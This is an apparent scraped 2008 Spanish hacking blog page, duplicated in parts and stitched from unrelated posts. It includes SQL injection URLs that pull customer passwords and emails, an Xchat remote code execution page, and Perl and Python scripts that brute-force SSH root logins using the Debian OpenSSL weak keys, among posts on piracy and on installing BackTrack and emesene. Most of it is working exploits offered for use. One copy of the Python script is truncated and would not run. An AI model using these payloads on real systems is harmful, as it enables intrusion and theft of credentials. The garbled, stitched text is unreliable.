## AUTHOR : JuDge
## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com
## Script WebSite:http://www.eshop100.co.uk
##Dork::)
##DescRipTiON: pull customers info from database
##EXPLOITS:
www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "AcmlmBoard v1.A2"
#
##
###
##
#
#This board software has several variables that are not properly validated before being used in SQL queries.
#An attacker can easily obtain sensitive information from the database by
#injecting unexpected SQL queries.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################
30/06/08
28/06/08
video en YouTube, donde invita a descargar ilegalmente música
Kid Rock ha publicado un video en YouTube, donde invita a descargar ilegalmente música - o en sus propias palabras, a robar música.
Como si lo anterior no fuera suficiente, luego exhorta al público a robar todo lo que se le antoje; automóviles, gasolina, música y películas. “Todo lo que necesites".
aqui al link: KID ROCK --> roba todo lo que puedas
Como si lo anterior no fuera suficiente, luego exhorta al público a robar todo lo que se le antoje; automóviles, gasolina, música y películas. “Todo lo que necesites".
aqui al link: KID ROCK --> roba todo lo que puedas
27/06/08
Una Guia Linuxera, Para un Windolero
Hola, ¿qué tal? Navegando ayer por el foro de elhacker me encontré esta guía para los novatos o, como el título lo dice, para un windolero =). Bueno, he aquí el link
Una Guia Linuxera, Para un Windolero
Una Guia Linuxera, Para un Windolero
23/06/08
Como Instalar Back|Track 3
Primero que nada tienes que tener ya hecha una partición. Con 4 GB es más que suficiente. Corremos el live CD de BackTrack 3, abrimos una shell y comenzamos
bt~#mkdir /mnt/backtrack3 ---> creamos una carpeta dentro de /mnt
bt~#mount /dev/sda10 /mnt/backtrack3/ --> montamos la particion donde queremos instalar /dev/sda10
bt~#mkdir /mnt/backtrack3/boot/ ---> creamos otro directorio
bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/ ---> instalamos tardara unos minutos
####----> despues de que termine con la instalacion terminamos con esto. -----------####
bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}
bt~#mount --bind /dev/ /mnt/backtrack3/dev/
bt~#mount -t proc proc /mnt/backtrack3/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/
Para agregarlo al GRUB, en mi caso solo edité el archivo menu.lst de mi Debian.
bt ~ # fdisk -l
Disk /dev/sda: 60.0 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sda1 * 1 34 273073+ 83 Linux
/dev/sda2 35 7296 58332015 5 Extended
/dev/sda5 35 642 4883728+ 83 Linux
/dev/sda6 643 1007 2931831 83 Linux
/dev/sda7 1008 1337 2650693+ 82 Linux swap
/dev/sda8 1338 1386 393561 83 Linux
/dev/sda9 1387 6019 37214541 83 Linux
/dev/sda10 6020 7296 10257471 83 Linux
Disk /dev/sdb: 123.5 GB, 123522416640 bytes
255 heads, 63 sectors/track, 15017 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sdb1 * 1 15017 120624021 7 HPFS/NTFS
como podran ver fue en la /dev/sda10 donde instale el back|track3
entonces:
Entré en el archivo menu.lst de Debian y lo edité
#nano /boot/grub/menu.lst
title Back|track3
root (hd0,9)
kernel /boot/vmlinuz root=/dev/sda10 ro
Con eso fue más que suficiente para tener Back|Track 3 en mi HD.
aqui el link para descargar BACK|TRACK3
bt~#mkdir /mnt/backtrack3 ---> creamos una carpeta dentro de /mnt
bt~#mount /dev/sda10 /mnt/backtrack3/ --> montamos la particion donde queremos instalar /dev/sda10
bt~#mkdir /mnt/backtrack3/boot/ ---> creamos otro directorio
bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/ ---> instalamos tardara unos minutos
####----> despues de que termine con la instalacion terminamos con esto. -----------####
bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}
bt~#mount --bind /dev/ /mnt/backtrack3/dev/
bt~#mount -t proc proc /mnt/backtrack3/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/
Para agregarlo al GRUB, en mi caso solo edité el archivo menu.lst de mi Debian.
bt ~ # fdisk -l
Disk /dev/sda: 60.0 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sda1 * 1 34 273073+ 83 Linux
/dev/sda2 35 7296 58332015 5 Extended
/dev/sda5 35 642 4883728+ 83 Linux
/dev/sda6 643 1007 2931831 83 Linux
/dev/sda7 1008 1337 2650693+ 82 Linux swap
/dev/sda8 1338 1386 393561 83 Linux
/dev/sda9 1387 6019 37214541 83 Linux
/dev/sda10 6020 7296 10257471 83 Linux
Disk /dev/sdb: 123.5 GB, 123522416640 bytes
255 heads, 63 sectors/track, 15017 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sdb1 * 1 15017 120624021 7 HPFS/NTFS
como podran ver fue en la /dev/sda10 donde instale el back|track3
entonces:
Entré en el archivo menu.lst de Debian y lo edité
#nano /boot/grub/menu.lst
title Back|track3
root (hd0,9)
kernel /boot/vmlinuz root=/dev/sda10 ro
Con eso fue más que suficiente para tener Back|Track 3 en mi HD.
aqui el link para descargar BACK|TRACK3
18/06/08
Instalar emesene
emesene es un cliente de mensajería similar al MSN. La verdad, en lo personal aún prefiero Pidgin, pero siempre hay más alternativas que probar.
Primero editamos nuestro sources.list
#pico /etc/apt/sources.list
Y agregamos los repos.
deb http://apt.emesene.org/ ./
deb-src http://apt.emesene.org/ ./
Ahora:
#apt-get update
Y ahora instalamos:
#apt-get install emesene
Y listo.
Primero editamos nuestro sources.list
#pico /etc/apt/sources.list
Y agregamos los repos.
deb http://apt.emesene.org/ ./
deb-src http://apt.emesene.org/ ./
Ahora:
#apt-get update
Y ahora instalamos:
#apt-get install emesene
Y listo.
13/06/08
Xchat <= 2.8.7b Remote Code Execution
##################################################################################################################
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI handler vulnerability, but the approach is a bit different.
# We don't use any % or ../../../ as the other related bugs do, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an IRC server, and also needs IE *.
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like these you can talk about individual freedom, you're probably a terrorist"
#
# PoC: this only launches calc; the sky is the limit past this point.
html
head title Welcome to my personal website /title /head
body
script document.location='ircs://blabla@3.3.3.3" --command "shell calc"'/script
/body
/html
###http://www.milw0rm.com/#####
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI handler vulnerability, but the approach is a bit different.
# We don't use any % or ../../../ as the other related bugs do, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an IRC server, and also needs IE *.
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like these you can talk about individual freedom, you're probably a terrorist"
#
# PoC: this only launches calc; the sky is the limit past this point.
html
head title Welcome to my personal website /title /head
body
script document.location='ircs://blabla@3.3.3.3" --command "shell calc"'/script
/body
/html
###http://www.milw0rm.com/#####
11/06/08
02/06/08
Exploit SSH ---> OpenSSL
dandome unas visitas por milworm encontre :
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
The Debian OpenSSL issue means that only 65.536 distinct SSH keys can be
generated, because the only entropy is the PID of the process generating
the key.
This means that the following Perl script can be used with the
precalculated SSH keys to brute-force the SSH login. It works if such a
key is installed on an unpatched Debian or on any other system manually
configured to accept it.
On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
2. Extract it to a directory
3. Enter into /root/.ssh/authorized_keys an SSH RSA key with 2048
bits, generated on an unpatched Debian (this is the key this exploit will
break)
4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
# Offer precomputed SSH private keys to one host as root, several keys per
# ssh invocation. Key files are expected to have all-digit file names and
# to live in the directory given as the first argument.
#
# Usage: ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry
#
# Keys collected before ssh is run; the batch fires when the count EXCEEDS
# this value, so each ssh call carries keysPerConnect + 1 identities.
my $keysPerConnect = 6;
unless ($ARGV[1]) {
    print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
    print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
    print "By mm@deadbeef.de\n";
    exit 0;
}
# Work inside the key directory so bare file names can be passed to -i.
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
    chomp;
    # Only entries whose name is entirely digits are treated as keys.
    next unless m,^\d+$,;
    push(@a, $_);
    if (scalar(@a) > $keysPerConnect) {
        # Echo the batch, then run one ssh with every key of the batch as an
        # identity (presumably so one connection offers several keys).
        # The command is built as a single shell string and handed to system().
        system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
        @a = ();
    }
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
mm@deadbeef.de
# milw0rm.com [2008-05-15]
Y TAMBIEN
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)
#!/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
# http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
# - execute: python exploit.py (without parameters) to display the help
# - if the key is found, the script shows something like that:
# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################
import Queue
import os
import string
import time
from threading import Thread
import sys
#This class only has a boolean, which will be True if some thread find the key
class End():
    """Shared stop flag polled by the worker threads.

    One instance is handed to every Connection and to the main progress
    loop; a worker whose SSH attempt succeeds calls Finish(), and every
    poller stops once it observes GetEnd() returning True.
    """
    def __init__(self):
        # Starts unset; set to True by Finish().
        self.end = False
    def Finish(self):
        # Signal every poller that the search is over.
        self.end = True
    def GetEnd(self):
        # Read the flag (no lock; it is a plain boolean attribute).
        return self.end
#This is the thread class
class Connection(Thread):
    """Worker thread that offers candidate private keys to one SSH host.

    Each worker pulls key file names from the shared queue and runs the
    system ssh client once per key, with password authentication disabled
    so only the offered identity can be accepted.

    Python 2 only: print statements, os.popen3 and the Queue module.

    Args:
        QueueDir: Queue of key file names (relative to ``dir``) still to try.
        TheEnd: shared End flag; set by the worker that finds a match.
        dir: directory holding the candidate private keys (no trailing slash).
        host: SSH host to connect to.
        user: login name to use.
        port: SSH port, kept as a string because it is concatenated into the
            command line (default '22').

    NOTE(review): on the target side each attempt is a refused public-key
    authentication from one source; a burst of those in sshd's auth log
    is the detection signal for this kind of key enumeration.
    """
    def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
        Thread.__init__(self)
        self.QueueDir = QueueDir
        self.TheEnd = TheEnd
        self.dir = dir
        self.host = host
        self.user = user
        self.port = port
    def run(self):
        # Keep going until some worker reports success or no keys remain.
        while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
            key = self.QueueDir.get()
            # One shell string: ssh runs the remote command 'exit', then the
            # local shell echoes ssh's exit status, so stdout carries '0'
            # exactly when the login was accepted.
            cmd = 'ssh -l ' + self.user
            cmd = cmd + ' -p ' + self.port
            cmd = cmd + ' -o PasswordAuthentication=no'
            cmd = cmd + ' -i ' + self.dir + '/' + key
            cmd = cmd + ' ' + self.host + ' exit; echo $?'
            # os.popen3 returns (stdin, stdout, stderr) of the child shell.
            pin,pout,perr = os.popen3(cmd, 'r')
            pin.close()
            #To debug, uncomment the next line. This will show the errors reported by ssh
            #print perr.read()
            if pout.read().lstrip().rstrip() == '0':
                # Stop the other workers and report the matching key file.
                self.TheEnd.Finish()
                print ''
                print 'Key Found in file: '+ key
                print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
                print ''
# --- Script body: parse argv, fill the key queue, start workers, report progress ---
print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'
if len(sys.argv) < 4:
    # Usage text. As printed on this page the names of the three required
    # positionals are missing; they appear to have been stripped during
    # extraction (likely angle-bracketed placeholders) -- verify against the
    # original file.
    print './exploit.py [[port] [threads]]'
    print ': Path to SSH privatekeys (ex. /home/john/keys) without final slash'
    print ': The victim host'
    print ': The user of the victim host'
    print ' [port]: The SSH port of the victim host (default 22)'
    print ' [threads]: Number of threads (default 4) Too big numer is bad'
    sys.exit(1)
# Required positionals. 'dir' shadows the builtin but is the name the
# Connection constructor call below relies on.
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]
# Optional port and thread count. 'port' stays a string because it is
# concatenated into the ssh command; 'threads' is either the int default or
# the argv string and is normalised with int() when the workers are started.
if len(sys.argv) <= 4:
    port='22'
    threads=4
else:
    if len(sys.argv) <=5:
        port=sys.argv[4]
        threads = 4
    else:
        port=sys.argv[4]
        threads = sys.argv[5]
# Queue every entry of the key directory except public halves
# (any name containing '.pub' is skipped).
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
for i in range(len(ListDir)):
    if ListDir[i].find('.pub') == -1:
        QueueDir.put(ListDir[i])
initsize = QueueDir.qsize()
tested = 0
for i in range(0,int(threads)):
    Connection(QueueDir,TheEnd,dir,host,user,port).start()
# Progress report every 5 s until a worker succeeds or the queue drains.
# 'speed' is the number of keys consumed during the last interval divided
# by its length (integer division, so it rounds down).
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
    time.sleep(5)
    actsize = QueueDir.qsize()
    speed = (initsize - tested - actsize)/5
    tested = initsize - actsize
    print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
# milw0rm.com [2008-06-01]
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
The Debian OpenSSL issue means that only 65.536 distinct SSH keys can be
generated, because the only entropy is the PID of the process generating
the key.
This means that the following Perl script can be used with the
precalculated SSH keys to brute-force the SSH login. It works if such a
key is installed on an unpatched Debian or on any other system manually
configured to accept it.
On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
2. Extract it to a directory
3. Enter into /root/.ssh/authorized_keys an SSH RSA key with 2048
bits, generated on an unpatched Debian (this is the key this exploit will
break)
4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
# Offer precomputed SSH private keys to one host as root, several keys per
# ssh invocation. Key files are expected to have all-digit file names and
# to live in the directory given as the first argument.
#
# Usage: ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry
#
# Keys collected before ssh is run; the batch fires when the count EXCEEDS
# this value, so each ssh call carries keysPerConnect + 1 identities.
my $keysPerConnect = 6;
unless ($ARGV[1]) {
    print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
    print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
    print "By mm@deadbeef.de\n";
    exit 0;
}
# Work inside the key directory so bare file names can be passed to -i.
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
    chomp;
    # Only entries whose name is entirely digits are treated as keys.
    next unless m,^\d+$,;
    push(@a, $_);
    if (scalar(@a) > $keysPerConnect) {
        # Echo the batch, then run one ssh with every key of the batch as an
        # identity (presumably so one connection offers several keys).
        # The command is built as a single shell string and handed to system().
        system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
        @a = ();
    }
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
mm@deadbeef.de
# milw0rm.com [2008-05-15]
Y TAMBIEN
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)
#!/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
# http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
# - execute: python exploit.py (without parameters) to display the help
# - if the key is found, the script shows something like that:
# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################
import Queue
import os
import string
import time
from threading import Thread
import sys
#This class only has a boolean, which will be True if some thread find the key
class End():
    """Shared stop flag polled by the worker threads.

    One instance is handed to every Connection and to the main progress
    loop; a worker whose SSH attempt succeeds calls Finish(), and every
    poller stops once it observes GetEnd() returning True.
    """
    def __init__(self):
        # Starts unset; set to True by Finish().
        self.end = False
    def Finish(self):
        # Signal every poller that the search is over.
        self.end = True
    def GetEnd(self):
        # Read the flag (no lock; it is a plain boolean attribute).
        return self.end
#This is the thread class
class Connection(Thread):
    """Worker thread that offers candidate private keys to one SSH host.

    Each worker pulls key file names from the shared queue and runs the
    system ssh client once per key, with password authentication disabled
    so only the offered identity can be accepted.

    Python 2 only: print statements, os.popen3 and the Queue module.

    Args:
        QueueDir: Queue of key file names (relative to ``dir``) still to try.
        TheEnd: shared End flag; set by the worker that finds a match.
        dir: directory holding the candidate private keys (no trailing slash).
        host: SSH host to connect to.
        user: login name to use.
        port: SSH port, kept as a string because it is concatenated into the
            command line (default '22').

    NOTE(review): on the target side each attempt is a refused public-key
    authentication from one source; a burst of those in sshd's auth log
    is the detection signal for this kind of key enumeration.
    """
    def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
        Thread.__init__(self)
        self.QueueDir = QueueDir
        self.TheEnd = TheEnd
        self.dir = dir
        self.host = host
        self.user = user
        self.port = port
    def run(self):
        # Keep going until some worker reports success or no keys remain.
        while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
            key = self.QueueDir.get()
            # One shell string: ssh runs the remote command 'exit', then the
            # local shell echoes ssh's exit status, so stdout carries '0'
            # exactly when the login was accepted.
            cmd = 'ssh -l ' + self.user
            cmd = cmd + ' -p ' + self.port
            cmd = cmd + ' -o PasswordAuthentication=no'
            cmd = cmd + ' -i ' + self.dir + '/' + key
            cmd = cmd + ' ' + self.host + ' exit; echo $?'
            # os.popen3 returns (stdin, stdout, stderr) of the child shell.
            pin,pout,perr = os.popen3(cmd, 'r')
            pin.close()
            #To debug, uncomment the next line. This will show the errors reported by ssh
            #print perr.read()
            if pout.read().lstrip().rstrip() == '0':
                # Stop the other workers and report the matching key file.
                self.TheEnd.Finish()
                print ''
                print 'Key Found in file: '+ key
                print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
                print ''
# --- Script body: parse argv, fill the key queue, start workers, report progress ---
print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'
if len(sys.argv) < 4:
    # Usage text. The next four lines are truncated as printed on this page
    # (their closing text, presumably starting at an angle bracket, was lost
    # in extraction) and do not parse as shown -- verify against the original.
    print './exploit.py
    print '
    print '
    print '
    print ' [port]: The SSH port of the victim host (default 22)'
    print ' [threads]: Number of threads (default 4) Too big numer is bad'
    sys.exit(1)
# Required positionals. 'dir' shadows the builtin but is the name the
# Connection constructor call below relies on.
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]
# Optional port and thread count. 'port' stays a string because it is
# concatenated into the ssh command; 'threads' is either the int default or
# the argv string and is normalised with int() when the workers are started.
if len(sys.argv) <= 4:
    port='22'
    threads=4
else:
    if len(sys.argv) <=5:
        port=sys.argv[4]
        threads = 4
    else:
        port=sys.argv[4]
        threads = sys.argv[5]
# Queue every entry of the key directory except public halves
# (any name containing '.pub' is skipped).
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
for i in range(len(ListDir)):
    if ListDir[i].find('.pub') == -1:
        QueueDir.put(ListDir[i])
initsize = QueueDir.qsize()
tested = 0
for i in range(0,int(threads)):
    Connection(QueueDir,TheEnd,dir,host,user,port).start()
# Progress report every 5 s until a worker succeeds or the queue drains.
# 'speed' is the number of keys consumed during the last interval divided
# by its length (integer division, so it rounds down).
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
    time.sleep(5)
    actsize = QueueDir.qsize()
    speed = (initsize - tested - actsize)/5
    tested = initsize - actsize
    print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
# milw0rm.com [2008-06-01]



